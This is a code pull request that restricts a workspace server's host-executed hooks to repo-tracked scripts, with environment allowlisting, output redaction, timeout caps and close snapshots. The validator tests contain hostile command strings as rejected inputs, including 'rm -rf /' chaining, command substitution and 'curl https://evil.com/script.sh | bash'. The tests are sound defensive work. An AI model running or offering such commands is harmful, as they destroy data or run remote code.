### PR TITLE
Guard governed worktree hooks

### DIFF
--- a/docs/how-to/setup-paperclip.md
+++ b/docs/how-to/setup-paperclip.md
@@ -1,0 +1,32 @@
+# Setup Paperclip
+
+## Governed Worktree Hooks
+
+Execution workspace provision and teardown hooks are host-executed. Keep them
+repo-managed and versioned in the project checkout, for example:
+
+```sh
+bash ./scripts/provision-worktree.sh
+bash ./scripts/teardown-worktree.sh
+```
+
+Paperclip rejects inline shell snippets, heredocs, remote URLs, missing files,
+and untracked hook scripts before handing a realized workspace `cwd` to an
+adapter. Agent API keys cannot create or mutate host-executed commands through
+project, issue, agent override, or execution-workspace update paths.
+
+Hook subprocesses receive only the governed environment allowlist: selected
+`PAPERCLIP_WORKSPACE_*` values, `PAPERCLIP_PROJECT_ID`, `PAPERCLIP_AGENT_ID`,
+`PAPERCLIP_COMPANY_ID`, `PAPERCLIP_ISSUE_ID`, minimal shell/path variables, and
+the local Paperclip config fields required by the bundled worktree init script.
+Output evidence is truncated and redacted before persistence.
+
+Default hook timeout is 300 seconds. Operators may lower or raise it with
+`PAPERCLIP_WORKSPACE_HOOK_TIMEOUT_MS`; the effective value is capped by
+`PAPERCLIP_WORKSPACE_HOOK_TIMEOUT_MAX_MS` (default cap 900 seconds).
+
+Closing an execution workspace first archives the record with a persistent
+`metadata.closeSnapshot`, then attempts runtime stop, cleanup, teardown, and
+artifact removal. Cleanup failures are non-destructive: the workspace moves to
+`cleanup_failed`, keeps the close snapshot, and records cleanup warnings for
+manual follow-up.

--- a/server/src/__tests__/environment-run-orchestrator.test.ts
+++ b/server/src/__tests__/environment-run-orchestrator.test.ts
@@ -1,3 +1,8 @@
+import { execFile } from "node:child_process";
+import fs from "node:fs/promises";
+import os from "node:os";
+import path from "node:path";
+import { promisify } from "node:util";
 import { beforeEach, describe, expect, it, vi } from "vitest";
 
 // ---------------------------------------------------------------------------
@@ -55,6 +60,8 @@ import {
 import type { Environment, EnvironmentLease, ExecutionWorkspace } from "@paperclipai/shared";
 import type { RealizedExecutionWorkspace } from "../services/workspace-runtime.ts";
 import type { EnvironmentRuntimeService } from "../services/environment-runtime.ts";
+
+const execFileAsync = promisify(execFile);
 
 // ---------------------------------------------------------------------------
 // Fixtures
@@ -153,6 +160,7 @@ function makePersistedExecutionWorkspace(
 function makeRealizeInput(overrides: {
   environment?: Environment;
   lease?: EnvironmentLease;
+  executionWorkspace?: RealizedExecutionWorkspace;
   persistedExecutionWorkspace?: ExecutionWorkspace | null;
 } = {}): Parameters<ReturnType<typeof environmentRunOrchestrator>["realizeForRun"]>[0] {
   return {
@@ -162,7 +170,7 @@ function makeRealizeInput(overrides: {
     companyId: "company-1",
     issueId: null,
     heartbeatRunId: "run-1",
-    executionWorkspace: makeExecutionWorkspace(),
+    executionWorkspace: overrides.executionWorkspace ?? makeExecutionWorkspace(),
     effectiveExecutionWorkspaceMode: null,
     persistedExecutionWorkspace: overrides.persistedExecutionWorkspace !== undefined
       ? overrides.persistedExecutionWorkspace
@@ -193,6 +201,25 @@ function makeMockRuntime(overrides: Partial<EnvironmentRuntimeService> = {}): En
     }),
     ...overrides,
   } as unknown as EnvironmentRuntimeService;
+}
+
+async function createRepoManagedProvisionWorkspace(scriptName = "provision-remote.sh") {
+  const cwd = await fs.mkdtemp(path.join(os.tmpdir(), "paperclip-remote-provision-"));
+  await execGit(cwd, ["init"]);
+  await execGit(cwd, ["config", "user.email", "paperclip@example.test"]);
+  await execGit(cwd, ["config", "user.name", "Paperclip Test"]);
+  await fs.mkdir(path.join(cwd, "scripts"), { recursive: true });
+  await fs.writeFile(path.join(cwd, "scripts", scriptName), "#!/usr/bin/env bash\necho provision ok\n", "utf8");
+  await execGit(cwd, ["add", "scripts"]);
+  await execGit(cwd, ["commit", "-m", "Add provision hook"]);
+  return {
+    cwd,
+    command: `bash ./scripts/${scriptName}`,
+  };
+}
+
+async function execGit(cwd: string, args: string[]) {
+  await execFileAsync("git", args, { cwd });
 }
 
 // ---------------------------------------------------------------------------
@@ -356,6 +383,7 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
   });
 
   it("runs a remote provision command after workspace realization when configured", async () => {
+    const provision = await createRepoManagedProvisionWorkspace();
     mockBuildWorkspaceRealizationRequest.mockReturnValue({
       version: 1,
       adapterType: "claude_local",
@@ -377,7 +405,7 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
         worktreePath: null,
       },
       runtimeOverlay: {
-        provisionCommand: "npm install -g @anthropic-ai/claude-code",
+        provisionCommand: provision.command,
       },
     });
     mockResolveEnvironmentExecutionTarget.mockResolvedValue({
@@ -405,6 +433,7 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
 
     await orchestrator.realizeForRun(makeRealizeInput({
       environment: makeEnvironment("sandbox"),
+      executionWorkspace: makeExecutionWorkspace(provision.cwd),
     }));
 
     expect(runtime.execute).toHaveBeenCalledOnce();
@@ -412,15 +441,19 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
       environment: expect.objectContaining({ driver: "sandbox" }),
       lease: expect.objectContaining({ id: "lease-1" }),
       command: "bash",
-      args: ["-lc", "npm install -g @anthropic-ai/claude-code"],
+      args: ["-lc", provision.command],
       cwd: "/remote/workspace",
-      env: {
+      env: expect.objectContaining({
         SHELL: "/bin/bash",
-      },
+        PAPERCLIP_COMPANY_ID: "company-1",
+        PAPERCLIP_WORKSPACE_CWD: provision.cwd,
+      }),
+      timeoutMs: 300_000,
     }));
   });
 
   it("runs project-level provision commands for ssh environments", async () => {
+    const provision = await createRepoManagedProvisionWorkspace("provision-ssh.sh");
     mockBuildWorkspaceRealizationRequest.mockReturnValue({
       version: 1,
       adapterType: "gemini_local",
@@ -442,7 +475,7 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
         worktreePath: null,
       },
       runtimeOverlay: {
-        provisionCommand: "npm install -g @google/gemini-cli",
+        provisionCommand: provision.command,
       },
     });
     mockResolveEnvironmentExecutionTarget.mockResolvedValue({
@@ -490,16 +523,18 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
           username: "ssh-user",
         },
       }),
+      executionWorkspace: makeExecutionWorkspace(provision.cwd),
     }));
 
     expect(runtime.execute).toHaveBeenCalledWith(expect.objectContaining({
       command: "bash",
-      args: ["-lc", "npm install -g @google/gemini-cli"],
+      args: ["-lc", provision.command],
     }));
     expect(mockResolveEnvironmentExecutionTarget).toHaveBeenCalledOnce();
   });
 
   it("surfaces remote provision command failures before resolving the adapter target", async () => {
+    const provision = await createRepoManagedProvisionWorkspace("install-tool.sh");
     mockBuildWorkspaceRealizationRequest.mockReturnValue({
       version: 1,
       adapterType: "claude_local",
@@ -521,7 +556,7 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
         worktreePath: null,
       },
       runtimeOverlay: {
-        provisionCommand: "install-tool",
+        provisionCommand: provision.command,
       },
     });
 
@@ -538,6 +573,7 @@ describe("environmentRunOrchestrator — realizeForRun", () => {
 
     await expect(orchestrator.realizeForRun(makeRealizeInput({
       environment: makeEnvironment("sandbox"),
+      executionWorkspace: makeExecutionWorkspace(provision.cwd),
     }))).rejects.toSatisfy(
       (err: unknown) =>
         err instanceof EnvironmentRunError &&

--- a/server/src/__tests__/execution-workspaces-routes.test.ts
+++ b/server/src/__tests__/execution-workspaces-routes.test.ts
@@ -18,11 +18,23 @@ const mockWorkspaceOperationService = vi.hoisted(() => ({
 }));
 
 const mockLogActivity = vi.hoisted(() => vi.fn(async () => undefined));
+const mockCleanupExecutionWorkspaceArtifacts = vi.hoisted(() => vi.fn());
+const mockStopRuntimeServicesForExecutionWorkspace = vi.hoisted(() => vi.fn());
 
 vi.mock("../services/index.js", () => ({
   executionWorkspaceService: () => mockExecutionWorkspaceService,
   logActivity: mockLogActivity,
   workspaceOperationService: () => mockWorkspaceOperationService,
+}));
+
+vi.mock("../services/workspace-runtime.js", () => ({
+  buildWorkspaceRuntimeDesiredStatePatch: vi.fn(),
+  cleanupExecutionWorkspaceArtifacts: mockCleanupExecutionWorkspaceArtifacts,
+  ensurePersistedExecutionWorkspaceAvailable: vi.fn(),
+  listConfiguredRuntimeServiceEntries: vi.fn(() => []),
+  runWorkspaceJobForControl: vi.fn(),
+  startRuntimeServicesForWorkspaceControl: vi.fn(),
+  stopRuntimeServicesForExecutionWorkspace: mockStopRuntimeServicesForExecutionWorkspace,
 }));
 
 function createApp() {
@@ -55,6 +67,12 @@ describe.sequential("execution workspace routes", () => {
         projectWorkspaceId: null,
       },
     ]);
+    mockExecutionWorkspaceService.getById.mockResolvedValue(null);
+    mockExecutionWorkspaceService.getCloseReadiness.mockResolvedValue(null);
+    mockExecutionWorkspaceService.update.mockResolvedValue(null);
+    mockWorkspaceOperationService.createRecorder.mockReturnValue({});
+    mockCleanupExecutionWorkspaceArtifacts.mockResolvedValue({ cleaned: true, warnings: [] });
+    mockStopRuntimeServicesForExecutionWorkspace.mockResolvedValue(undefined);
   });
 
   it("uses summary mode for lightweight workspace lookups", async () => {
@@ -78,5 +96,119 @@ describe.sequential("execution workspace routes", () => {
       reuseEligible: true,
     });
     expect(mockExecutionWorkspaceService.list).not.toHaveBeenCalled();
+  });
+
+  it("persists close snapshot and cleanup_failed evidence when cleanup is incomplete", async () => {
+    const existingWorkspace = {
+      id: "workspace-1",
+      companyId: "company-1",
+      projectId: null,
+      projectWorkspaceId: null,
+      sourceIssueId: null,
+      mode: "isolated_workspace",
+      strategyType: "git_worktree",
+      name: "Workspace",
+      status: "active",
+      cwd: "/tmp/workspace",
+      repoUrl: null,
+      baseRef: "main",
+      branchName: "feature/test",
+      providerType: "git_worktree",
+      providerRef: "/tmp/workspace",
+      derivedFromExecutionWorkspaceId: null,
+      lastUsedAt: new Date(),
+      openedAt: new Date(),
+      closedAt: null,
+      cleanupEligibleAt: null,
+      cleanupReason: null,
+      config: null,
+      metadata: { createdByRuntime: true },
+      runtimeServices: [],
+      createdAt: new Date(),
+      updatedAt: new Date(),
+    };
+    const archivedWorkspace = {
+      ...existingWorkspace,
+      status: "archived",
+      closedAt: new Date(),
+      metadata: {
+        createdByRuntime: true,
+        closeSnapshot: {
+          version: 1,
+          cleanupStatus: "pending",
+        },
+      },
+    };
+    const failedCleanupWorkspace = {
+      ...archivedWorkspace,
+      status: "cleanup_failed",
+      cleanupReason: "leftover worktree",
+      metadata: {
+        createdByRuntime: true,
+        closeSnapshot: {
+          version: 1,
+          cleanupStatus: "incomplete",
+          cleanupWarnings: ["leftover worktree"],
+          cleaned: false,
+        },
+      },
+    };
+
+    mockExecutionWorkspaceService.getById.mockResolvedValue(existingWorkspace);
+    mockExecutionWorkspaceService.getCloseReadiness.mockResolvedValue({
+      workspaceId: "workspace-1",
+      state: "ready",
+      blockingReasons: [],
+      warnings: [],
+      linkedIssues: [],
+      plannedActions: [{ kind: "archive_record" }],
+      isDestructiveCloseAllowed: true,
+      isSharedWorkspace: false,
+      isProjectPrimaryWorkspace: false,
+      git: null,
+      runtimeServices: [],
+    });
+    mockExecutionWorkspaceService.update
+      .mockResolvedValueOnce(archivedWorkspace)
+      .mockResolvedValueOnce(failedCleanupWorkspace);
+    mockCleanupExecutionWorkspaceArtifacts.mockResolvedValue({
+      cleaned: false,
+      warnings: ["leftover worktree"],
+    });
+
+    const res = await request(createApp())
+      .patch("/api/execution-workspaces/workspace-1")
+      .send({ status: "archived" });
+
+    expect(res.status).toBe(200);
+    expect(res.body.status).toBe("cleanup_failed");
+    expect(mockExecutionWorkspaceService.update).toHaveBeenNthCalledWith(
+      1,
+      "workspace-1",
+      expect.objectContaining({
+        status: "archived",
+        metadata: expect.objectContaining({
+          closeSnapshot: expect.objectContaining({
+            cleanupStatus: "pending",
+            statusBeforeClose: "active",
+          }),
+        }),
+      }),
+    );
+    expect(mockExecutionWorkspaceService.update).toHaveBeenNthCalledWith(
+      2,
+      "workspace-1",
+      expect.objectContaining({
+        status: "cleanup_failed",
+        cleanupReason: "leftover worktree",
+        metadata: expect.objectContaining({
+          closeSnapshot: expect.objectContaining({
+            cleanupStatus: "incomplete",
+            cleanupWarnings: ["leftover worktree"],
+            cleaned: false,
+          }),
+        }),
+      }),
+    );
   });
 });

--- a/server/src/__tests__/workspace-runtime.test.ts
+++ b/server/src/__tests__/workspace-runtime.test.ts
@@ -31,6 +31,7 @@ import {
   releaseRuntimeServicesForRun,
   resetRuntimeServicesForTests,
   resolveWorkspaceRuntimeReadinessTimeoutSec,
+  resolveWorkspaceHookTimeoutMs,
   resolveShell,
   sanitizeRuntimeServiceBaseEnv,
   startRuntimeServicesForWorkspaceControl,
@@ -1520,6 +1521,121 @@ describe("realizeExecutionWorkspace", () => {
     expect(provisionOperation?.result.stdout?.length ?? 0).toBeLessThan(300000);
   }, 10_000);
 
+  it("rejects non repo-managed provision commands", async () => {
+    const repoRoot = await createTempRepo();
+    await expect(
+      realizeExecutionWorkspace({
+        base: {
+          baseCwd: repoRoot,
+          source: "project_primary",
+          projectId: "project-1",
+          workspaceId: "workspace-1",
+          repoUrl: null,
+          repoRef: "HEAD",
+        },
+        config: {
+          workspaceStrategy: {
+            type: "git_worktree",
+            branchTemplate: "{{issue.identifier}}-{{slug}}",
+            provisionCommand: "printf 'unsafe\\n'",
+          },
+        },
+        issue: {
+          id: "issue-1",
+          identifier: "PAP-1143",
+          title: "Reject arbitrary provision",
+        },
+        agent: {
+          id: "agent-1",
+          name: "Codex Coder",
+          companyId: "company-1",
+        },
+      }),
+    ).rejects.toThrow("repo-managed");
+  });
+
+  it("passes only allowlisted env keys and redacts provision output evidence", async () => {
+    const repoRoot = await createTempRepo();
+    const { recorder, operations } = createWorkspaceOperationRecorderDouble();
+    process.env.AWS_SECRET_ACCESS_KEY = "leaked-secret";
+
+    await fs.mkdir(path.join(repoRoot, "scripts"), { recursive: true });
+    await fs.writeFile(
+      path.join(repoRoot, "scripts", "inspect-env.js"),
+      [
+        "const env = process.env;",
+        "console.log(JSON.stringify({",
+        "  workspace: env.PAPERCLIP_WORKSPACE_CWD,",
+        "  agent: env.PAPERCLIP_AGENT_ID,",
+        "  company: env.PAPERCLIP_COMPANY_ID,",
+        "  issue: env.PAPERCLIP_ISSUE_ID,",
+        "  leaked: env.AWS_SECRET_ACCESS_KEY || null,",
+        "  token: 'api_key: \"super-secret-value\"',",
+        "}));",
+      ].join("\n"),
+      "utf8",
+    );
+    await runGit(repoRoot, ["add", "scripts/inspect-env.js"]);
+    await runGit(repoRoot, ["commit", "-m", "Add env inspection provision script"]);
+
+    await realizeExecutionWorkspace({
+      base: {
+        baseCwd: repoRoot,
+        source: "project_primary",
+        projectId: "project-1",
+        workspaceId: "workspace-1",
+        repoUrl: null,
+        repoRef: "HEAD",
+      },
+      config: {
+        workspaceStrategy: {
+          type: "git_worktree",
+          branchTemplate: "{{issue.identifier}}-{{slug}}",
+          provisionCommand: "node ./scripts/inspect-env.js",
+        },
+      },
+      issue: {
+        id: "issue-1",
+        identifier: "PAP-1144",
+        title: "Provision env allowlist",
+      },
+      agent: {
+        id: "agent-1",
+        name: "Codex Coder",
+        companyId: "company-1",
+      },
+      recorder,
+    });
+
+    delete process.env.AWS_SECRET_ACCESS_KEY;
+
+    const provisionOperation = operations.find((operation) => operation.phase === "workspace_provision");
+    const payload = JSON.parse(provisionOperation?.result.stdout ?? "{}") as Record<string, unknown>;
+    expect(payload).toMatchObject({
+      agent: "agent-1",
+      company: "company-1",
+      issue: "issue-1",
+      leaked: null,
+      token: "api_key: \"***REDACTED***\"",
+    });
+    expect(String(payload.workspace)).toContain("PAP-1144-provision-env-allowlist");
+    expect(provisionOperation?.metadata).toMatchObject({
+      envKeys: expect.arrayContaining([
+        "PAPERCLIP_AGENT_ID",
+        "PAPERCLIP_COMPANY_ID",
+        "PAPERCLIP_ISSUE_ID",
+        "PAPERCLIP_WORKSPACE_CWD",
+      ]),
+      timeoutMs: 300_000,
+    });
+  });
+
+  it("caps configured workspace hook timeouts", () => {
+    expect(resolveWorkspaceHookTimeoutMs({ requestedMs: 1_000 })).toBe(1_000);
+    expect(resolveWorkspaceHookTimeoutMs({ requestedMs: 900_000, maxMs: 120_000 })).toBe(120_000);
+    expect(resolveWorkspaceHookTimeoutMs({ requestedMs: 0, defaultMs: 300_000 })).toBe(300_000);
+  });
+
   it("reuses an existing branch without resetting it when recreating a missing worktree", async () => {
     const repoRoot = await createTempRepo();
     const branchName = "PAP-450-recreate-missing-worktree";
@@ -1979,6 +2095,10 @@ describe("realizeExecutionWorkspace", () => {
   it("records teardown and cleanup operations when a recorder is provided", async () => {
     const repoRoot = await createTempRepo();
     const { recorder, operations } = createWorkspaceOperationRecorderDouble();
+    await fs.mkdir(path.join(repoRoot, "scripts"), { recursive: true });
+    await fs.writeFile(path.join(repoRoot, "scripts", "cleanup.sh"), "printf 'cleanup ok\\n'\n", "utf8");
+    await runGit(repoRoot, ["add", "scripts/cleanup.sh"]);
+    await runGit(repoRoot, ["commit", "-m", "Add cleanup hook"]);
 
     const workspace = await realizeExecutionWorkspace({
       base: {
@@ -2025,7 +2145,7 @@ describe("realizeExecutionWorkspace", () => {
       },
       projectWorkspace: {
         cwd: repoRoot,
-        cleanupCommand: "printf 'cleanup ok\\n'",
+        cleanupCommand: "bash ./scripts/cleanup.sh",
       },
       recorder,
     });
@@ -2035,7 +2155,7 @@ describe("realizeExecutionWorkspace", () => {
       "worktree_cleanup",
       "worktree_cleanup",
     ]);
-    expect(operations[0]?.command).toBe("printf 'cleanup ok\\n'");
+    expect(operations[0]?.command).toBe("bash ./scripts/cleanup.sh");
     expect(operations[1]?.metadata).toMatchObject({
       cleanupAction: "worktree_remove",
     });

--- a/server/src/__tests__/workspace-runtime.test.ts
+++ b/server/src/__tests__/workspace-runtime.test.ts
@@ -19,6 +19,7 @@ import {
 } from "@paperclipai/db";
 import { eq } from "drizzle-orm";
 import {
+  assertWorkspaceHookCommandIsRepoManaged,
   buildWorkspaceRuntimeDesiredStatePatch,
   cleanupExecutionWorkspaceArtifacts,
   ensurePersistedExecutionWorkspaceAvailable,
@@ -3354,5 +3355,83 @@ describe("normalizeAdapterManagedRuntimeServices", () => {
       scopeId: "execution-workspace-1",
       executionWorkspaceId: "execution-workspace-1",
     });
+  });
+});
+
+describe("assertWorkspaceHookCommandIsRepoManaged — governed hook validation", () => {
+  let tempRepoDir: string;
+
+  beforeAll(async () => {
+    tempRepoDir = await fs.mkdtemp(path.join(os.tmpdir(), "hook-validation-"));
+    const scriptsDir = path.join(tempRepoDir, "scripts");
+    await fs.mkdir(scriptsDir, { recursive: true });
+    await fs.writeFile(path.join(scriptsDir, "provision.sh"), "#!/bin/bash\necho ok\n", { mode: 0o755 });
+    await execFileAsync("git", ["-C", tempRepoDir, "init"]);
+    await execFileAsync("git", ["-C", tempRepoDir, "config", "user.email", "test@test.com"]);
+    await execFileAsync("git", ["-C", tempRepoDir, "config", "user.name", "test"]);
+    await execFileAsync("git", ["-C", tempRepoDir, "add", "."]);
+    await execFileAsync("git", ["-C", tempRepoDir, "commit", "-m", "init"]);
+  });
+
+  afterAll(async () => {
+    await fs.rm(tempRepoDir, { recursive: true, force: true });
+  });
+
+  it("accepts a simple governed script reference", () => {
+    expect(() => assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh", tempRepoDir)).not.toThrow();
+  });
+
+  it("accepts a governed script with simple flag arguments", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh --env prod", tempRepoDir),
+    ).not.toThrow();
+  });
+
+  it("rejects shell operator && after validated script path", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh && echo pwned", tempRepoDir),
+    ).toThrow(/shell operators/i);
+  });
+
+  it("rejects shell operator || after validated script path", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh || true", tempRepoDir),
+    ).toThrow(/shell operators/i);
+  });
+
+  it("rejects semicolon chaining after validated script path", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh ; rm -rf /", tempRepoDir),
+    ).toThrow(/shell operators/i);
+  });
+
+  it("rejects pipe operator after validated script path", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh | cat", tempRepoDir),
+    ).toThrow(/shell operators/i);
+  });
+
+  it("rejects command substitution $() after validated script path", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh $(whoami)", tempRepoDir),
+    ).toThrow(/shell operators/i);
+  });
+
+  it("rejects backtick substitution after validated script path", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash ./scripts/provision.sh `whoami`", tempRepoDir),
+    ).toThrow(/shell operators/i);
+  });
+
+  it("rejects heredoc syntax", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("bash <<EOF\necho pwned\nEOF", tempRepoDir),
+    ).toThrow(/heredoc/i);
+  });
+
+  it("rejects remote URL commands", () => {
+    expect(() =>
+      assertWorkspaceHookCommandIsRepoManaged("curl https://evil.com/script.sh | bash", tempRepoDir),
+    ).toThrow(/heredoc.*URL|URL/i);
   });
 });

--- a/server/src/routes/execution-workspaces.ts
+++ b/server/src/routes/execution-workspaces.ts
@@ -496,11 +496,28 @@ export function executionWorkspaceRoutes(db: Db) {
       }
 
       const closedAt = new Date();
+      const baseCloseMetadata = (
+        (patch.metadata as Record<string, unknown> | null | undefined) ??
+        existing.metadata ??
+        {}
+      ) as Record<string, unknown>;
+      const closeSnapshot = {
+        version: 1,
+        closedAt: closedAt.toISOString(),
+        statusBeforeClose: existing.status,
+        cleanupStatus: "pending",
+        plannedActionCount: readiness.plannedActions.length,
+        warningCount: readiness.warnings.length,
+      };
       const archivedWorkspace = await svc.update(id, {
         ...patch,
         status: "archived",
         closedAt,
         cleanupReason: null,
+        metadata: {
+          ...baseCloseMetadata,
+          closeSnapshot,
+        },
       });
       if (!archivedWorkspace) {
         res.status(404).json({ error: "Execution workspace not found" });
@@ -536,7 +553,7 @@ export function executionWorkspaceRoutes(db: Db) {
                 cleanupCommand: projectWorkspaces.cleanupCommand,
               })
               .from(projectWorkspaces)
-            .where(
+              .where(
                 and(
                   eq(projectWorkspaces.id, existing.projectWorkspaceId),
                   eq(projectWorkspaces.companyId, existing.companyId),
@@ -564,23 +581,42 @@ export function executionWorkspaceRoutes(db: Db) {
           }),
         });
         cleanupWarnings = cleanupResult.warnings;
+        const cleanupStatus = cleanupResult.cleaned ? "completed" : "incomplete";
+        const metadataWithCleanupEvidence = {
+          ...((workspace.metadata as Record<string, unknown> | null) ?? {}),
+          closeSnapshot: {
+            ...closeSnapshot,
+            cleanupStatus,
+            cleanupWarnings,
+            cleaned: cleanupResult.cleaned,
+          },
+        };
         const cleanupPatch: Record<string, unknown> = {
           closedAt,
           cleanupReason: cleanupWarnings.length > 0 ? cleanupWarnings.join(" | ") : null,
+          metadata: metadataWithCleanupEvidence,
         };
         if (!cleanupResult.cleaned) {
           cleanupPatch.status = "cleanup_failed";
         }
-        if (cleanupResult.warnings.length > 0 || !cleanupResult.cleaned) {
-          workspace = (await svc.update(id, cleanupPatch)) ?? workspace;
-        }
+        workspace = (await svc.update(id, cleanupPatch)) ?? workspace;
       } catch (error) {
         const failureReason = error instanceof Error ? error.message : String(error);
+        const metadataWithCleanupFailure = {
+          ...((workspace.metadata as Record<string, unknown> | null) ?? {}),
+          closeSnapshot: {
+            ...closeSnapshot,
+            cleanupStatus: "failed",
+            cleanupWarnings: [failureReason],
+            cleaned: false,
+          },
+        };
         workspace =
           (await svc.update(id, {
             status: "cleanup_failed",
             closedAt,
             cleanupReason: failureReason,
+            metadata: metadataWithCleanupFailure,
           })) ?? workspace;
         res.status(500).json({
           error: `Failed to archive execution workspace: ${failureReason}`,

--- a/server/src/services/environment-run-orchestrator.ts
+++ b/server/src/services/environment-run-orchestrator.ts
@@ -44,8 +44,13 @@ import { buildWorkspaceRealizationRequest } from "./workspace-realization.js";
 import { executionWorkspaceService } from "./execution-workspaces.js";
 import { logActivity } from "./activity-log.js";
 import { parseObject } from "../adapters/utils.js";
-import type { RealizedExecutionWorkspace } from "./workspace-runtime.js";
+import {
+  assertWorkspaceHookCommandIsRepoManaged,
+  resolveWorkspaceHookTimeoutMs,
+  type RealizedExecutionWorkspace,
+} from "./workspace-runtime.js";
 import type { PluginWorkerManager } from "./plugin-worker-manager.js";
+import { redactSensitiveText } from "../redaction.js";
 
 // ---------------------------------------------------------------------------
 // Error types
@@ -136,9 +141,31 @@ function formatProvisionFailureDetail(result: {
   const signal = typeof result.signal === "string" && result.signal.trim().length > 0
     ? ` (signal ${result.signal.trim()})`
     : "";
-  const detail = firstNonEmptyLine(result.stderr) ?? firstNonEmptyLine(result.stdout);
+  const detail =
+    firstNonEmptyLine(redactSensitiveText(result.stderr)) ??
+    firstNonEmptyLine(redactSensitiveText(result.stdout));
   const status = `exit code ${result.exitCode ?? "null"}${signal}`;
   return detail ? `${status}: ${detail}` : status;
+}
+
+function buildRemoteProvisionEnv(input: {
+  companyId: string;
+  issueId: string | null;
+  executionWorkspace: RealizedExecutionWorkspace;
+}) {
+  return {
+    SHELL: "/bin/bash",
+    PAPERCLIP_WORKSPACE_CWD: input.executionWorkspace.cwd,
+    PAPERCLIP_WORKSPACE_PATH: input.executionWorkspace.cwd,
+    PAPERCLIP_WORKSPACE_WORKTREE_PATH: input.executionWorkspace.worktreePath ?? input.executionWorkspace.cwd,
+    PAPERCLIP_WORKSPACE_BRANCH: input.executionWorkspace.branchName ?? "",
+    PAPERCLIP_WORKSPACE_REPO_REF: input.executionWorkspace.repoRef ?? "",
+    PAPERCLIP_WORKSPACE_REPO_URL: input.executionWorkspace.repoUrl ?? "",
+    PAPERCLIP_PROJECT_ID: input.executionWorkspace.projectId ?? "",
+    PAPERCLIP_AGENT_ID: "",
+    PAPERCLIP_COMPANY_ID: input.companyId,
+    PAPERCLIP_ISSUE_ID: input.issueId ?? "",
+  };
 }
 
 // ---------------------------------------------------------------------------
@@ -418,17 +445,35 @@ export function environmentRunOrchestrator(
         : executionWorkspace.cwd);
     if (provisionCommand && environment.driver !== "local") {
       try {
+        assertWorkspaceHookCommandIsRepoManaged(provisionCommand, executionWorkspace.cwd);
+        const timeoutMs = resolveWorkspaceHookTimeoutMs();
+        const provisionEnv = buildRemoteProvisionEnv({
+          companyId,
+          issueId,
+          executionWorkspace,
+        });
         const provisionResult = await environmentRuntime.execute({
           environment,
           lease,
           command: "bash",
           args: ["-lc", provisionCommand],
           cwd: realizedCwd,
-          env: {
-            SHELL: "/bin/bash",
-          },
-          timeoutMs: 300_000,
+          env: provisionEnv,
+          timeoutMs,
         });
+        workspaceRealization = {
+          ...workspaceRealization,
+          provision: {
+            command: redactSensitiveText(provisionCommand),
+            cwd: realizedCwd,
+            envKeys: Object.keys(provisionEnv).sort(),
+            timeoutMs,
+            exitCode: provisionResult.exitCode,
+            timedOut: provisionResult.timedOut,
+            stdout: redactSensitiveText(provisionResult.stdout).slice(0, 4096),
+            stderr: redactSensitiveText(provisionResult.stderr).slice(0, 4096),
+          },
+        };
         if (provisionResult.exitCode !== 0 || provisionResult.timedOut) {
           throw new Error(formatProvisionFailureDetail(provisionResult));
         }

--- a/server/src/services/workspace-runtime.ts
+++ b/server/src/services/workspace-runtime.ts
@@ -547,7 +547,7 @@ async function executeProcess(input: {
           timedOut = true;
           child.kill("SIGTERM");
           globalThis.setTimeout(() => {
-            if (!child.killed) child.kill("SIGKILL");
+            if (child.exitCode === null) child.kill("SIGKILL");
           }, 2_000).unref();
         }, timeoutMs)
       : null;
@@ -832,6 +832,12 @@ function resolveRepoManagedWorkspaceCommand(command: string, repoRoot: string) {
 
     const prefix = match.groups.prefix ?? "";
     const suffix = match.groups.suffix ?? "";
+    if (suffix && /[;&|`$(){}<>!]|&&|\|\|/.test(suffix)) {
+      throw new Error(
+        "Workspace hook command suffix contains shell operators or metacharacters. " +
+          "Only simple arguments to the governed script are allowed.",
+      );
+    }
     return `${prefix}${quoteShellArg(repoManagedPath)}${suffix}`;
   }
 
@@ -1477,9 +1483,13 @@ export async function cleanupExecutionWorkspaceArtifacts(input: {
 
   for (const command of cleanupCommands) {
     try {
-      const resolvedCommand = repoRoot
-        ? resolveRepoManagedWorkspaceCommand(command, repoRoot)
-        : command;
+      if (!repoRoot) {
+        warnings.push(
+          `Skipping cleanup command "${command}" — cannot validate governed hook without resolved repo root.`,
+        );
+        continue;
+      }
+      const resolvedCommand = resolveRepoManagedWorkspaceCommand(command, repoRoot);
       const timeoutMs = resolveWorkspaceHookTimeoutMs();
       await recordWorkspaceCommandOperation(input.recorder, {
         phase: "workspace_teardown",

--- a/server/src/services/workspace-runtime.ts
+++ b/server/src/services/workspace-runtime.ts
@@ -1,4 +1,4 @@
-import { spawn, type ChildProcess } from "node:child_process";
+import { execFileSync, spawn, type ChildProcess } from "node:child_process";
 import { existsSync, lstatSync, readdirSync, readFileSync, realpathSync } from "node:fs";
 import fs from "node:fs/promises";
 import net from "node:net";
@@ -16,6 +16,7 @@ import {
 import { and, desc, eq, inArray } from "drizzle-orm";
 import { asNumber, asString, parseObject, renderTemplate } from "../adapters/utils.js";
 import { resolveHomeAwarePath } from "../home-paths.js";
+import { redactEventPayload, redactSensitiveText } from "../redaction.js";
 import {
   createLocalServiceKey,
   findLocalServiceRegistryRecordByRuntimeServiceId,
@@ -112,6 +113,23 @@ const runtimeServicesById = new Map<string, RuntimeServiceRecord>();
 const runtimeServicesByReuseKey = new Map<string, string>();
 const runtimeServiceLeasesByRun = new Map<string, string[]>();
 const DEFAULT_EXECUTE_PROCESS_OUTPUT_BYTES = 256 * 1024;
